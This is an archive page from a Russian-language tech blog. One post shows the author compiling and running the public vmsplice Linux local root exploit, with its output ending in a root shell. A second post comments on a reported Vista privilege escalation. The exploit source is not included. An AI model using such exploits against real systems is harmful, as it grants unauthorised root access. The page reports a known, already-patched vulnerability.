Archive

Archive for the ‘взлом’ Category

Локальный Root на Linux

February 11th, 2008 4 comments

Сегодня ночью (или вчера) в сети появился код эксплоита для получения локального рута. Насколько я знаю, то уязвимости подвержены ядра c 2.6.17. На сегодняшний день выпущено ядро 2.6.24.2, в котором уязвимость уже профиксена. Получить рута от простого пользователя не сложно, имея код эксплоита, что и было проверено мной на машине:

wert2all@wert2all:~/tmp/exploid> uname -a
Linux wert2all 2.6.22.16-0.2-default #1 SMP 2008/02/01 19:36:55 UTC x86_64 x86_64 x86_64 GNU/Linux
wert2all@wert2all:~/tmp/exploid> gcc local_root.c -o local-root
wert2all@wert2all:~/tmp/exploid> ./local-root
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b260abaf000 .. 0x2b260abe1000
[+] root
wert2all:~/tmp/exploid # whoami
root
wert2all:~/tmp/exploid #

Это печально, даже если учесть, что у некоторых он не срабатывает с первого раза. Пока апдейта для OpenSuSE нет, но после такого должно выйти быстренько.

Categories: Linux, openSuse, security, взлом Tags:

Наши поезда самые …

February 9th, 2007 No comments

Vista c БалмеромИнтересненькую маленькую заметочку прочитал сегодня на Linux and Open Source Blog.

Cool: Russians Hacked VISTA Security

Russian hackers posted instructions to an underground forum describing how to implement “privilege escalation,” which could bypass some Vista security measures. This hack could escalate the “privileges” of a normal Vista user into that of a “superuser,” allowing him to change anything he desired on the system. This would be particularly dangerous in a corporate environment where normal computer users have limited privileges, in that they cannot install programs, visit certain Web sites, etc. This threat is considered so serious that Microsoft has scrambled its “Security Response Center,” which is ostensibly still trying to figure out what to do.

Hmm … “the most secure version of Windows yet” … nah.

Коротко: русские каким-то боком нашли способ поднять привилегии с никого до суперпользователя. И это самая защищённая Windows с всех!!! Как по мне, то самая “оно” была 2k.

Categories: security, vista, взлом Tags: